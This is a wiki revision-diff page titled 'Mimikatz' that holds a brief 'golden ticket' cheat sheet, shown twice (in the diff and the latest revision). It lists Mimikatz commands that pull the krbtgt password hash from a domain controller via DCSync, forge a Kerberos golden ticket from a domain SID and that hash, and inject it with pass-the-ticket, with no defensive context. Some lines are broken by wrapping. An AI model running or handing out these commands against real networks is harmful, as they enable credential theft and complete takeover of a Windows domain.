Mimikatz: Difference between revisions
Jump to navigation
Jump to search
(Created page with "= golden ticket = <syntaxhighlight lang="powershell"> #get krbtgt password hash .\Mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:contoso.int /user:krbtgt exit mim...") (change visibility) |
No edit summary (change visibility) |
||
(One intermediate revision by the same user not shown) | |||
Line 1: | Line 1: | ||
= golden ticket = | = golden ticket = | ||
<syntaxhighlight | <syntaxhighlight language="powershell"> | ||
#get krbtgt password hash | #get krbtgt password hash | ||
.\Mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:contoso.int /user:krbtgt exit | .\Mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:contoso.int /user:krbtgt exit | ||
Line 7: | Line 7: | ||
mimikatz # kerberos::golden /admin:adminuser /domain:contoso.int /sid:S-1-5-21-0123456789-012345678-0234567890-1112 /krbt | mimikatz # kerberos::golden /admin:adminuser /domain:contoso.int /sid:S-1-5-21-0123456789-012345678-0234567890-1112 /krbt | ||
gt:8dd38658f31da2b60103a2856d7fd42a /ticket:myticket.kiribi | gt:8dd38658f31da2b60103a2856d7fd42a /ticket:myticket.kiribi | ||
kerberos::ptt myticket.kiribi | |||
kerberos::tgt ticket:myadmin-golden.kiribi | kerberos::tgt ticket:myadmin-golden.kiribi |
Latest revision as of 10:38, 7 July 2020
golden ticket
#get krbtgt password hash
.\Mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:contoso.int /user:krbtgt exit
mimikatz # kerberos::golden /admin:adminuser /domain:contoso.int /sid:S-1-5-21-0123456789-012345678-0234567890-1112 /krbt
gt:8dd38658f31da2b60103a2856d7fd42a /ticket:myticket.kiribi
kerberos::ptt myticket.kiribi
kerberos::tgt ticket:myadmin-golden.kiribi